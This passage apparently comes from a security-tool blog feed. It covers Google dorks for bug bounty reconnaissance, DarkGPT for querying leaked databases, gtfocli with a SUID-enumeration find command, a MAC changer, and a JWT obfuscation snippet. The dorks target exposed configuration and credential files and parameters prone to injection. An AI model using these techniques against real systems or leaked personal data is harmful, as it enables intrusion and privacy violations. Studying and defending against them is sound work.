href="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705598837786290" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDLbbZ1CDYrrsQvm4Ln_X6brlGyEQz8mQQeBoPjikFZ0Jh8oK7WwmVJqcWQf2hw04jlzyMG4cbO3WDbPTp1fAffwi8-kuwYsd_yRttLh3CFpqi6n_IuJRqXchBtU7J7SLPty4FAQf9X0yisSrr-7wYe9mFKe6dgWSVrVidzkxv2QgtXmgINciJEhOOZYA=w612-h640" width="612" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA"><img alt="" border="0" height="640" id="BLOGGER_PHOTO_ID_7345705607758732882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjydxtve6oyE__RmQRhp61aApBrAlLVHiSw-DvAKGRHOhUY9LU3wUNK5ckw_ZpEY_UDEnokDJ6p3j-aRZeU3pj3Li3VNiHw_o5Vq091h-4LUy_3M4osR2lrsGv7OG_8Mxi44M7F9dcSmgw3sdjtaA3zTXnAOAIOIVazuKsQQHs4LfEf9Pa04FDUk_PLxMA=w352-h640" width="352" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4"><img alt="" border="0" height="624" id="BLOGGER_PHOTO_ID_7345705610000417314" src="https://blogger.googleusercontent.com/img/a/AVvXsEhaYNG_yti0seVzgB1gjBDD5ktu2HG1EeOdS7UrqzMAb9usSnv3jDYbTJAhOGuMbsnopIuzzp4-3LH8KLq8voTLXfF2UL8CKZ00PzReyHi4dmrSWgZ8V6CpNVCQCvdQHYQGjCgdXXyLGgiUIynwgX_4toVqGPsLfhDEVcj3tOcJ5v9_WzZOJ4xCgOPtDc4=w640-h624" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM"><img alt="" border="0" height="596" id="BLOGGER_PHOTO_ID_7345705613876228946" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS9SkrWat9tOWBKqXbQCPVNOxcfikv60H-BdqvOhfJcvnbR1YtdRnGojRmDgvsu8UfVSBlRg25xwROSXuSyBfAcn989nm7spS8sJkLgX0SegvjB3XtBvh5cr_ZOgwSrD-NA46hf6s4J-yEcfhk9AlFTEpzO2theT7HDh09FDVkZiAu0pOgbC630RykSXM=w640-h596" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8"><img alt="" border="0" height="380" id="BLOGGER_PHOTO_ID_7345705617714872402" src="https://blogger.googleusercontent.com/img/a/AVvXsEgJPTq8xInSdKBSa6BpVZrGhvdkXRJH1rb7CetGHsi4B3F7pl33CFHbd7alSnVcmhZWg7jQjc2sNggHFP6AqZxgpBfHfTBczqCUw7qHvAv8t8ky7qRpD5m4drv7EvVcDNcYraQWrWCGynX7eotRtmEXwIaIjQsfkZILhteFJ2b_Nk3lZUThfxrzG4HYUw8=w640-h380" width="640" /></a> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg"><img alt="" border="0" height="576" id="BLOGGER_PHOTO_ID_7345705622803912882" src="https://blogger.googleusercontent.com/img/a/AVvXsEjMCv7sNhBT8dY8DPILQufguMCSZXZmeWVRykEQ06TQfoZQpIu9EQurcJ63GHM6xniOe9thhwhu2NPTRKPQQUiGywXb22ocozWu9ghXB9xlE2r6867oVbrfOfg6rYwh7_pFYMzYbEKLGgTZfPBhUV-RXoGxlxROpqnTtVTEvZ2zwd-mJYFCkinVYLu6dTg=w640-h576" width="640" /></a></p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/akhomlyuk/pyradm" rel="nofollow" target="_blank" title="Download Pyradm">Download Pyradm</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-47449134233814466432024-03-14T08:30:00.007-03:002024-03-14T08:30:00.232-03:00Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7345638495062138434" src="https://blogger.googleusercontent.com/img/a/AVvXsEjw0SFLnTOabwaCF-I0fJ6yf9HM_V7lWJyZlAobhJIAzGdn_CJPabbnBf9lYrvxKLgSP5jXfjQJHQVE3QF96d7DULS1GG5pvCY_a_PwnWTNsWfZv4CALnW3SVIeEmcDyNYqShxDQkjrjqjWNO4U94AiOUbGCBHOxpmDwzmU4-lUnGab3GFyihV4TfGMPqfv=w640-h122" width="640" /></a></p><p><br /></p> <p>A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting</p> <p><a href="https://taksec.github.io/google-dorks-bug-bounty/" rel="nofollow" target="_blank" title="Live Tool">Live Tool</a></p> <span><a name='more'></a></span><p><br /></p> <p><a href="https://twitter.com/TakSec" rel="nofollow" target="_blank" title="A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting (3)"></a></p> <h3>Broad domain search w/ negative search</h3> <blockquote> <p>site:example.com -www -shop -share -ir -mfa</p> </blockquote> <h3>PHP extension w/ parameters</h3> <blockquote> <p>site:example.com ext:php inurl:?</p> </blockquote> <h3>Disclosed <a href="https://www.kitploit.com/search/label/XSS" target="_blank" title="XSS">XSS</a> and Open Redirects</h3> <blockquote> <p>site:openbugbounty.org inurl:reports intext:"example.com"</p> </blockquote> <h3>Juicy Extensions</h3> <blockquote> <p>site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess</p> </blockquote> <h3>XSS prone parameters</h3> <blockquote> <p>inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example.com</p> </blockquote> <h3>Open Redirect prone parameters</h3> <blockquote> <p>inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com</p> </blockquote> <h3>SQLi Prone Parameters</h3> <blockquote> <p>inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example.com</p> </blockquote> <h3>SSRF Prone Parameters</h3> <blockquote> <p>inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example.com</p> </blockquote> <h3>LFI Prone Parameters</h3> <blockquote> <p>inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example.com</p> </blockquote> <h3>RCE Prone Parameters</h3> <blockquote> <p>inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example.com</p> </blockquote> <h3>High % inurl keywords</h3> <blockquote> <p>inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php site:example[.]com</p> </blockquote> <h3>Sensitive Parameters</h3> <blockquote> <p>inurl:email= | inurl:phone= | inurl:password= | inurl:secret= inurl:& site:example[.]com</p> </blockquote> <h3>API Docs</h3> <blockquote> <p>inurl:apidocs | inurl:api-docs | inurl:swagger | inurl:api-explorer site:"example[.]com"</p> </blockquote> <h3>Code Leaks</h3> <blockquote> <p>site:pastebin.com "example.com"</p> <p>site:jsfiddle.net "example.com"</p> <p>site:codebeautify.org "example.com"</p> <p>site:codepen.io "example.com"</p> </blockquote> <h3>Cloud Storage</h3> <blockquote> <p>site:s3.amazonaws.com "example.com"</p> <p>site:blob.core.windows.net "example.com"</p> <p>site:googleapis.com "example.com"</p> <p>site:drive.google.com "example.com"</p> <p>site:dev.azure.com "example[.]com"</p> <p>site:onedrive.live.com "example[.]com"</p> <p>site:digitaloceanspaces.com "example[.]com"</p> <p>site:sharepoint.com "example[.]com"</p> <p>site:s3-external-1.amazonaws.com "example[.]com"</p> <p>site:s3.dualstack.us-east-1.amazonaws.com "example[.]com"</p> <p>site:dropbox.com/s "example[.]com"</p> <p>site:box.com/s "example[.]com"</p> <p>site:docs.google.com inurl:"/d/" "example[.]com"</p> </blockquote> <h3>JFrog Artifactory</h3> <blockquote> <p>site:jfrog.io "example[.]com"</p> </blockquote> <h3>Firebase</h3> <blockquote> <p>site:firebaseio.com "example[.]com"</p> </blockquote> <h3>File upload endpoints</h3> <blockquote> <p>site:example.com "choose file"</p> </blockquote> <h2>Dorks that work better w/o domain</h2> <h3>Bug Bounty programs and <a href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" title="Vulnerability">Vulnerability</a> Disclosure Programs</h3> <blockquote> <p>"submit vulnerability report" | "powered by bugcrowd" | "powered by hackerone"</p> <p>site:*/security.txt "bounty"</p> </blockquote> <h3>Apache Server Status Exposed</h3> <blockquote> <p>site:*/server-status apache</p> </blockquote> <h3>WordPress</h3> <blockquote> <p>inurl:/wp-admin/admin-ajax.php</p> </blockquote> <h3>Drupal</h3> <blockquote> <p>intext:"Powered by" & intext:Drupal & inurl:user</p> </blockquote> <h3>Joomla</h3> <blockquote> <p>site:*/joomla/login</p> </blockquote> <hr /> <p>Medium articles for more dorks:</p> <p>https://thegrayarea.tech/5-google-dorks-every-hacker-needs-to-know-fed21022a906</p> <p>https://infosecwriteups.com/uncover-hidden-gems-in-the-cloud-with-google-dorks-8621e56a329d</p> <p>https://infosecwriteups.com/10-google-dorks-for-sensitive-data-9454b09edc12</p> <p>Top Parameters:</p> <p>https://github.com/lutfumertceylan/top25-parameter</p> <p>Proviesec dorks:</p> <p>https://github.com/Proviesec/google-dorks</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/TakSec/google-dorks-bug-bounty" rel="nofollow" target="_blank" title="Download Google-Dorks-Bug-Bounty">Download Google-Dorks-Bug-Bounty</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-7402030000778680112024-03-13T08:30:00.001-03:002024-03-13T08:30:00.133-03:00DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv"><img alt="" border="0" height="248" id="BLOGGER_PHOTO_ID_7345627338818753346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMuN4qfzQxuoBy88dkXEM1GjaTgAN-BgZ6i-pcphCnL4pzkW7TGP5NgTmVYq0SjPUmyXWAJjK71njnn25nI9m0mgfYRiSU_c7iHYf3j60H76V486B96efUCcvKnz0ReYz2OPNQz0uBZeq_E1jVOrMG6wosEvjsWMJGA-nhM-XUJpnCTZkYBbgkpD2zFekv=w640-h248" width="640" /></a></p><p style="text-align: center;"><br /></p> <p>DarkGPT is an <a href="https://www.kitploit.com/search/label/Artificial%20Intelligence" target="_blank" title="artificial intelligence">artificial intelligence</a> assistant based on GPT-4-200K designed to perform queries on <a href="https://www.kitploit.com/search/label/Leaked" target="_blank" title="leaked">leaked</a> databases. This guide will help you set up and run the project on your local environment.</p><span><a name='more'></a></span><p><br /></p> <h2>Prerequisites</h2> <p>Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.</p> <h2>Environment Setup</h2> <ol> <li><strong>Clone the Repository</strong></li> </ol> <p>First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:</p> <p>git clone https://github.com/luijait/DarkGPT.git cd DarkGPT</p> <ol> <li><strong>Configure Environment Variables</strong></li> </ol> <p>You will need to set up some environment variables for the script to work correctly. Copy the <code>.env.example</code> file to a new file named <code>.env</code>:</p> <p>DEHASHED_API_KEY="your_dehashed_api_key_here"</p> <ol> <li><strong>Install Dependencies</strong></li> </ol> <p>This project requires certain Python packages to run. Install them by running the following command:</p> <p>pip install -r requirements.txt 4. Then Run the project: python3 main.py</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/luijait/DarkGPT" rel="nofollow" target="_blank" title="Download DarkGPT">Download DarkGPT</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-35363097260777600322024-03-12T20:38:00.002-03:002024-03-12T20:38:28.523-03:00Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems<h2 style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ"><img alt="" border="0" height="210" id="BLOGGER_PHOTO_ID_7345624906969636530" src="https://blogger.googleusercontent.com/img/a/AVvXsEjoe_UC5LKL6el8Xe7jBJUZ4ObCy5rVf9zMVptF_X4KtkRqUOH5msMmzAoEYcAHXdQ3D7O6wYYmgYxEBGy43tmVsOMHtng7QsYOGlPwM42Ij7vdJP1kEqeQqq3oanLaX6kjy7vWARpuOZcVVv6HAKHHhhN4SOlujwkELkMlWHUwh1ursuK6RTNxWE5q83XZ=w640-h210" width="640" /></a></h2><p><br /></p> <p><code>GTFOcli</code> it's a <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="Command Line">Command Line</a> Interface for easy binaries search commands that can be used to bypass local security <a href="https://www.kitploit.com/search/label/Restrictions" target="_blank" title="restrictions">restrictions</a> in misconfigured systems.</p><span><a name='more'></a></span><p><br /></p> <h2>Installation</h2> <p>Using <code>go</code>:</p> <pre><code>go install github.com/cmd-tools/gtfocli@latest<br /></code></pre> <p>Using <code>homebrew</code>:</p> <pre><code>brew tap cmd-tools/homebrew-tap<br />brew install gtfocli<br /></code></pre> <p>Using <code>docker</code>:</p> <pre><code>docker pull cmdtoolsowner/gtfocli<br /></code></pre> <h2>Usage</h2> <h3>Search for unix binaries</h3> <p>Search for <a href="https://www.kitploit.com/search/label/Binary" target="_blank" title="binary">binary</a> <code>tar</code>:</p> <pre><code>gtfocli search tar<br /></code></pre> <p>Search for binary <code>tar</code> from <code>stdin</code>:</p> <pre><code>echo "tar" | gtfocli search<br /></code></pre> <p>Search for binaries located into file;</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />gtfocli search -f myBinaryList.txt<br /></code></pre> <h3>Search for windows binaries</h3> <p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for binaries located into file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format (see <code>-h</code> for available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using dockerized solution</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for binary <code>tar</code> and print output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for binaries located into file mounted as volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>An example of common use case for <code>gtfocli</code> is together with <code>find</code>:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>, without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-16852404691714193012024-03-11T08:30:00.005-03:002024-03-11T08:30:00.134-03:00n0Mac - Yet Another Mac Changer!!!<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/s897/mac-chnager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="507" data-original-width="897" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnqQaVINxH2k3nx6UvFjh7i0pBQqg6JTOPwrot6M64uOk9r54CETlnG2_pZlRRZWhu0phd-YEdxvyHV8BbAPO3NkkFottAnMM5X81xz_tx5wlJF8K9D3Izj3cLrz7eGCNP8XWuWxCgdWeDYGKPJD71-qHkkUnmErgarZmO9DBCYr6rIifvwK4LZdgXiPG4/w640-h362/mac-chnager.png" width="640" /></a></div><p><br /></p> <p>This script changes the MAC address of the network interface to a randomly generated address on system startup using crontab. It then uses the <a href="https://www.kitploit.com/search/label/Macchanger" target="_blank" title="macchanger">macchanger</a> command to generate a list of MAC address vendors and selects one at random and then combines that vendor prefix with a randomly generated suffix to create the new MAC address.</p><span><a name='more'></a></span><p><br /></p> <p>Note: This tool is intended for educational purposes only. It is not intended for any malicious activities or any other illegal activities. By using this tool, you agree to the terms and conditions set forth in the disclaimer and accept full responsibility for any misuse of the tool. The author of this tool is not liable for any damages or losses resulting from the use or misuse of this tool by anyone.</p> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>chmod +x install.sh</li> <li>./install.sh</li> </ul> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <ul> <li>chmod +x n0Mac.sh</li> <li>./n0Mac.sh</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/chaudharyarjun/n0Mac" rel="nofollow" target="_blank" title="Download n0Mac">Download n0Mac</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-36129257561929026772024-03-10T08:30:00.004-03:002024-03-10T08:30:00.149-03:00Some-Tweak-To-Hide-Jwt-Payload-Values - A Handful Of Tweaks And Ideas To Safeguard The JWT Payload<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y=w640-h488" width="640" /></a></p><div><br /></div><span style="font-size: x-large;"><b>some-tweak-to-hide-jwt-payload-values</b></span><ul> <li>a handful of tweaks and ideas to safeguard the JWT payload, making it futile to attempt decoding by constantly altering its value, <br /> ensuring the decoded output remains unintelligible while imposing minimal <a href="https://www.kitploit.com/search/label/Performance" target="_blank" title="performance">performance</a> overhead.</li> </ul><span><a name='more'></a></span><div><br /></div> <br /><span style="font-size: large;"><b>What is a JWT Token?</b></span><br /> <p>A JSON Web Token (JWT, pronounced "jot") is a compact and URL-safe way of passing a JSON message between two parties. It's a standard, defined in RFC 7519. The token is a long string, divided into parts separated by dots. Each part is base64 URL-encoded.</p> <p>What parts the token has depends on the type of the JWT: whether it's a JWS (a signed token) or a JWE (an encrypted token). If the token is signed it will have three sections: the header, the payload, and the signature. If the token is encrypted it will consist of five parts: the header, the encrypted key, the initialization vector, the <a href="https://www.kitploit.com/search/label/Ciphertext" target="_blank" title="ciphertext">ciphertext</a> (payload), and the <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> tag. Probably the most common use case for JWTs is to utilize them as <a href="https://www.kitploit.com/search/label/Access%20Tokens" target="_blank" title="access tokens">access tokens</a> and ID tokens in OAuth and OpenID Connect flows, but they can serve different purposes as well.</p> <br /><span style="font-size: large;"><b>Primary Objective of this Code Snippet</b></span><br /> <p>This code snippet offers a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens, where the stored keys are visible in plaintext. This code snippet provides a tweak perspective aiming to enhance the security of the payload section when decoding JWT tokens. Typically, the payload section appears in plaintext when decoded from the JWT token (base64). The main objective is to lightly encrypt or obfuscate the payload values, making it difficult to discern their meaning. The intention is to ensure that even if someone attempts to decode the payload values, they cannot do so easily.</p> <br /><span style="font-size: large;"><b>userid</b></span><br /> <ul> <li>The code snippet targets the key named "userid" stored in the payload section as an example.</li> <li>The choice of "userid" stems from its frequent use for user identification or authentication purposes after validating the token's validity (e.g., ensuring it has not expired).</li> </ul> <p>The idea behind attempting to obscure the value of the key named "userid" is as follows:</p> <br /><b>Encryption:</b><br /> <ul> <li>The timestamp is hashed and then encrypted by performing bitwise XOR operation with the user ID.</li> <li>XOR operation is performed using a symmetric key.</li> <li>The resulting value is then encoded using Base64.</li> </ul> <br /><b>Decryption:</b><br /> <ul> <li>Encrypted data is decoded using Base64.</li> <li>Decryption is performed by XOR operation with the symmetric key.</li> <li>The original user ID and hashed timestamp are revealed in plaintext.</li> <li>The user ID part is extracted by splitting at the "|" delimiter for relevant use and purposes.</li> </ul> <br /><b>Symmetric Key for XOR Encoding:</b><br /> <ul> <li>Various materials can be utilized for this key.</li> <li>It could be a salt used in conventional password hashing, an arbitrary random string, a generated UUID, or any other suitable material.</li> <li>However, this key should be securely stored in the <a href="https://www.kitploit.com/search/label/Database%20Management" target="_blank" title="database management">database management</a> system (DBMS).</li> </ul> <p>and..^^</p> <pre><code>in the example, the key is shown as { 'userid': 'random_value' },<br />making it apparent that it represents a user ID.<br /><br />However, this is merely for illustrative purposes.<br /><br />In practice, a predetermined and undisclosed name is typically used.<br />For example, 'a': 'changing_random_value'<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code snippet is created for educational purposes and serves as a starting point for ideas rather than being inherently secure. </li> <li>It provides a level of security beyond plaintext visibility but does not guarantee absolute safety.</li> </ul> <p>Attempting to tamper with JWT tokens generated using this method requires access to both the JWT secret key and the XOR symmetric key used to create the UserID.</p> <br /><span style="font-size: x-large;"><b>And...</b></span><br /> <ul> <li>If you find this helpful, please the <strong>"star"</strong>:star2: to support further improvements.</li> </ul> <br /><span style="font-size: x-large;"><b>preview</b></span><br /> <pre><code># python3 main.py<br /><br />- Current Unix Timestamp: 1709160368<br />- Current Unix Timestamp to Human Readable: 2024-02-29 07:46:08<br /><br />- userid: 23243232<br />- XOR Symmetric key: b'generally_user_salt_or_hash_or_random_uuid_this_value_must_be_in_dbms'<br />- JWT Secret key: yes_your_service_jwt_secret_key<br /><br />- Encoded UserID and Timestamp: VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo=<br />- Decoded UserID and Hashed Timestamp: 23243232|e27436b7393eb6c2fb4d5e2a508a9c5c<br /><br />- JWT Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0aW1lc3RhbXAiOiIyMDI0LTAyLTI5IDA3OjQ2OjA4IiwidXNlcmlkIjoiVlZaY1VVRlRYMTRGT2tkRVVVRnBFVlpmVFd3S0VHa0xVeFVLYXd0SE9rQUFXMVJYREdZV1FBbz0ifQ.bM_6cBZHdXhMZjyefr6YO5n5X51SzXjyBUEzFiBaZ7Q<br />- Decoded JWT: {'timestamp': '2024-02-29 07:46:08', 'userid': 'VVZcUUFTX14FOkdEUUFpEVZfTWwKEGkLUxUKawtHOkAAW1RXDGYWQAo='}<br /><br /><br /># run again<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:36', 'userid': 'VVZcUUFTX14FaRNAVBRpRQcORmtWRGl eVUtRZlYXaBZZCgYOWGlDR10='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:16:51', 'userid': 'VVZcUUFTX14FZxMRVUdnEgJZEmxfRztRVUBabAsRZkdVVlJWWztGQVA='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:01', 'userid': 'VVZcUUFTX14FbxYQUkM8RVRZEmkLRWsNUBYNb1sQPREFDFYKDmYRQV4='}<br />- Decoded JWT: {'timestamp': '2024-02-29 08:17:09', 'userid': 'VVZcUUFTX14FbUNEVEVqEFlaTGoKQjxZBRULOlpGPUtSClALWD5GRAs='}<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIIIRZK_8csXBiKKQLqCeLs-CZNovGymbzKzySW41ZXxwADbUGQxcdTjcvihz5pof-7kFR7g6fFdNdgJb3iXMh34P3DkZIv_Y6TDcY7rt4UitfjxCplkNCgKI80hFx4Z0acJO89AiG9dS0j_QcBLqmKmRW5x124dYZ1EdCql94VdwBPYsnsOImtzCXxq5Y"><img alt="" border="0" height="488" id="BLOGGER_PHOTO_ID_7343002266969214786" 